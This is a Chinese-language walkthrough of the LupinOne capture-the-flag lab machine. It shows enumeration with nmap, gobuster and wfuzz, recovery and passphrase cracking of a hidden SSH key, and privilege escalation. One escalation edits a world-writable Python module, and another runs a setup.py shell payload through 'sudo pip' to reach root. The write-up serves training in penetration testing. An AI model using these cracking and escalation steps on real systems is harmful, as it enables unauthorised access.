EmpireLupinOne
信息收集
Nmap
└─# nmap -sV -A 192.168.25.134
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 00:14 EDT
Nmap scan report for 192.168.25.134
Host is up (0.00024s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
| 256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_ 256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:9A:2D:7D (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms 192.168.25.134
Gobuster
===============================================================
2023/06/27 00:15:30 Starting gobuster in directory enumeration mode
===============================================================
//robots.txt (Status: 200) [Size: 34]
//index.html (Status: 200) [Size: 333]
//manual (Status: 301) [Size: 317] [--> http://192.168.25.134/manual/]
//image (Status: 301) [Size: 316] [--> http://192.168.25.134/image/]
//server-status (Status: 403) [Size: 279]
[ERROR] 2023/06/27 00:15:31 [!] parse "http://192.168.25.134//database/%": invalid URL escape "%"
//image/ (Status: 200) [Size: 953]
//manual/ (Status: 200) [Size: 676]
===============================================================
2023/06/27 00:16:05 Starting gobuster in directory enumeration mode
===============================================================
/robots.txt (Status: 200) [Size: 34]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswds (Status: 403) [Size: 279]
Progress: 6952 / 10289 (67.57%)
===============================================================
2023/06/27 00:16:06 Finished
===============================================================
手工对端口验证和信息整理
80
主页没有什么,我们继续访问robots.txt发现网页提示
User-agent: *
Disallow: /~myfiles
打开对应的目录发现是Error 404,在旧版本的Apache服务器中,~ 指代用户主目录,我们可以尝试找到与此相似的路径,使用wfuzz工具对其路径进行测试,发现~secret目录
┌──(root㉿kali)-[~]
└─# wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt --hc 403,404 http://192.168.25.134/~FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.25.134/~FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000718: 301 9 L 28 W 318 Ch "secret"
Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0
访问该网页,提示有ssh文件让我们查找,并且得知用户名为icex64
Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,
Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.
I'm smart I know that.
Any problem let me know
Your best friend icex64
接下来继续在该路径下搜索文件,得到.mysecret.txt文件
└─# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 -u http://192.168.25.134/~secret/.FUZZ.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.25.134/~secret/.FUZZ.txt
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 5 L 54 W 331 Ch "# directory-list-2.3-medium.txt"
000000007: 200 5 L 54 W 331 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000003: 200 5 L 54 W 331 Ch "# Copyright 2007 James Fisher"
000000013: 200 5 L 54 W 331 Ch "#"
000000005: 200 5 L 54 W 331 Ch "# This work is licensed under the Creative Commons"
000000009: 200 5 L 54 W 331 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000004: 200 5 L 54 W 331 Ch "#"
000000011: 200 5 L 54 W 331 Ch "# Priority ordered case sensative list, where entries were found"
000000006: 200 5 L 54 W 331 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000002: 200 5 L 54 W 331 Ch "#"
000000012: 200 5 L 54 W 331 Ch "# on atleast 2 different hosts"
000000008: 200 5 L 54 W 331 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000010: 200 5 L 54 W 331 Ch "#"
000073703: 200 1 L 1 W 4689 Ch "mysecret"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220546
Requests/sec.: 0
访问得到
cGxD6KNZQddY6iCsSuqPzUdqSx4F5ohDYnArU3kw5dmvTURqcaTrncHC3NLKBqFM2ywrNbRTW3eTpUvEz9qFuBnyhAK8TWu9cFxLoscWUrc4rLcRafiVvxPRpP692Bw5bshu6ZZpixzJWvNZhPEoQoJRx7jUnupsEhcCgjuXD7BN1TMZGL2nUxcDQwahUC...
使用Base58解码得到
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jYmMAAAAGYmNyeXB0AAAAGAAAABDy33c2Fp
PBYANne4oz3usGAAAAEAAAAAEAAAIXAAAAB3NzaC1yc2EAAAADAQABAAACAQDBzHjzJcvk
9GXiytplgT9z/mP91NqOU9QoAwop5JNxhEfm/j5KQmdj/JB7sQ1hBotONvqaAdmsK+OYL9
H6NSb0jMbMc4soFrBinoLEkx894B/PqUTODesMEV/aK22UKegdwlJ9Arf+1Y48V86gkzS6
...
-----END OPENSSH PRIVATE KEY-----
shell
在本地创建文件key,将私钥保存到其中,然后使用john工具破解密码。得到密码为P@55w0rd!,利用账密登录
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python2 /usr/share/john/ssh2john.py key > keyhash
john keyhash --wordlist=/usr/share/wordlists/fasttrack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd! (key)
1g 0:00:00:01 DONE (2023-06-27 05:04) 0.5780g/s 36.99p/s 36.99c/s 36.99C/s Winter2015..password2
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
水平越权
将key文件权限设为600(否则无法连接),然后利用ssh连接icex64用户,进入后就能拿到user.txt
chmod 600 key
ssh icex64@192.168.164.190 -i key
3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
我们首先看一下这个用户可以运行什么文件,发现可以运行一个python文件
icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icex64 may run the following commands on LupinOne:
(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
查看了python文件,发现它引用了webbrowser模块,我们去python目录下看能不能对这个模块进行修改,让它返回一个shell,我们通过find找到该文件的位置,查看其权限,发现可以写入内容
icex64@LupinOne:~$ find /usr/ -name '*webbrowser*'
/usr/lib/python3.9/webbrowser.py
/usr/lib/python3.9/__pycache__/webbrowser.cpython-39.pyc
icex64@LupinOne:~$ ls -l /usr/lib/python3.9/webbrowser.py
-rwxrwxrwx 1 root root 24087 Oct 4 2021 /usr/lib/python3.9/webbrowser.py
我们可以直接编辑该文件,写入反向shell或者是调用shell,获得arsene用户shell
icex64@LupinOne:~$ vi /usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/home/icex64$ whoami
arsene
权限提升
拿到arsene用户权限后,查看sudo -l,发现可以免密执行/usr/bin/pip
arsene@LupinOne:/home/icex64$ sudo -l
Matching Defaults entries for arsene on LupinOne:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User arsene may run the following commands on LupinOne:
(root) NOPASSWD: /usr/bin/pip
在arsene的目录下,创建setup.py文件,里面写入我们想运行的python脚本,如反弹shell,然后利用pip install以root权限执行。
arsene@LupinOne:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > setup.py
arsene@LupinOne:~$ sudo pip install .
Processing /home/arsene
# ls
heist.py note.txt setup.py
# cd
# pwd
/root
# ls
root.txt
# cat root.txt
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}